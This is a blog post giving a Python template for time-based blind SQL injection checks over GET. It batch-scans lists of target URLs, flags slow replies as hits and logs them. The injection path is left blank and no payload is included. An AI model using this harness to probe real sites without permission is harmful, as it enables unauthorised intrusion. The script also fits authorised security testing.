
SQL延时注入GET型模板,代码简单,可套用

站长 • 2024-02-29 11:21 • 174 次点击 • 技术文章


import requests
import argparse
from datetime import datetime
import time
import re
# Silence urllib3 warnings for the whole process. Combined with verify=False
# in poc(), this hides the InsecureRequestWarning that would otherwise be
# emitted for every request made without TLS certificate verification.
requests.packages.urllib3.disable_warnings()

# ANSI escape sequences used for console output: bold red, and reset.
RED_BOLD = "\033[1;31m"
RESET = "\033[0m"
def usage():
    """Print the banner and the command-line usage text in bold red."""
    # RED_BOLD / RESET are only read here, so no ``global`` statement is needed.
    banner = '''

    这都看不懂去找giao给你补个蛋

    使用方法:
        单个 python3 Sqli.py -u url[例 http://127.0.0.1:8080]
        批量 python3 Sqli.py -f filename

    开始检测................................
    '''
    print(RED_BOLD + banner + RESET)

# proxies = {'http': 'http://127.0.0.1:10808'}

def save_file(url):
    """Append *url* as a single line to ``result.txt`` in the working directory."""
    line = url + '\n'
    # Append mode keeps results from earlier runs.
    with open('result.txt', mode='a', encoding='utf-8') as out:
        out.write(line)

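def poc(check_url, flag):
    """Send one GET request to *check_url* and report whether the reply was delayed.

    A target is reported as a hit (printed in red, and the full URL appended
    to ``result.txt`` through ``save_file``) when the response status is 200
    and the response took longer than ``delay_threshold`` seconds.

    Args:
        check_url: Base URL of the target, including the scheme.
        flag: Mode marker supplied by the callers (1 from ``-u``, 0 from
            ``-f``). It is not used here and is kept so existing callers
            keep working.

    Returns:
        None. The outcome is printed; hits are also written to ``result.txt``.

    Raises:
        OSError: If ``result.txt`` cannot be written. The original code
            swallowed this and printed "target unreachable" instead, which
            silently lost the finding.
    """
    now_poc = datetime.now()
    stamp = now_poc.strftime("%Y-%m-%d %H:%M:%S")
    url = check_url + ""  # fill in the request path inside the quotes

    # Seconds of delay that count as a hit. Keep this in step with the delay
    # the request path above is expected to cause.
    delay_threshold = 5.0
    # The timeout has to be larger than the threshold. With timeout equal to
    # the threshold (as before), a reply held back for the full delay raised a
    # read timeout and was reported as "unreachable" instead of as a hit.
    request_timeout = delay_threshold + 5.0

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9'
    }

    try:
        # verify=False skips TLS certificate validation, so the peer is not
        # authenticated. Do not reuse this call for requests that carry
        # credentials or other sensitive data.
        response = requests.get(url, headers=headers, timeout=request_timeout, verify=False)
    except requests.RequestException:
        # Only network/HTTP errors are treated as "unreachable"; anything else
        # is a bug in this script and should surface.
        print(f'[-]{stamp}\t{check_url}\t无法访问,请检查目标站点是否存在')
        return

    # NOTE: one slow reply is weak evidence. A loaded server or slow network
    # can exceed the threshold on its own, so confirm a hit against an
    # ordinary request to the same host before recording it as a finding.
    elapsed = response.elapsed.total_seconds()
    if response.status_code == 200 and elapsed > delay_threshold:
        print(f'{RED_BOLD}[+]{stamp}\t{check_url}\t我淦!出货了!{RESET}')
        print(url)
        save_file(url)
    else:
        print(f'[-]{stamp}\t{check_url}\t绰!没洞')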

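def run(filepath):
    """Read targets from *filepath*, one per line, and pass each one to ``poc``.

    Blank lines are skipped. A line that does not already start with
    ``http://`` or ``https://`` (case-insensitive) gets ``http://`` prepended.

    Args:
        filepath: Path of a text file with one host or URL per line.
    """
    flag = 0  # batch-mode marker handed through to poc()

    # The context manager closes the list file; the original left it open.
    with open(filepath, "r") as handle:
        targets = [line.strip() for line in handle]

    for target in targets:
        if not target:
            # An empty line used to become the bare URL "http://".
            continue
        # Check the prefix, not a substring: the old "'http' in u" test also
        # matched hosts that merely contain "http", and it made the separate
        # "https" branch unreachable.
        if target.lower().startswith(("http://", "https://")):
            url = target
        else:
            url = 'http://' + target

        poc(url, flag)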

def main():
    """Parse ``-u``/``-f`` and run a single check or a batch run.

    The banner is always printed first, followed by a one-second pause.
    Exactly one of ``-u`` and ``-f`` must be given; with both or neither the
    usage text is printed a second time and nothing is checked.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="Sqli.py -u url")
    parser.add_argument("-f", "--file", help="Sqli.py -f file")
    opts = parser.parse_args()

    usage()
    time.sleep(1)

    has_url = opts.url is not None
    has_file = opts.file is not None

    if has_url and not has_file:
        # Single-target mode; 1 is the mode marker poc() receives.
        poc(opts.url, 1)
        return
    if has_file and not has_url:
        run(opts.file)
        return
    usage()

# Run the command-line entry point only when executed as a script, so that
# importing this module does not parse arguments or send any request.
if __name__ == '__main__':
    main()
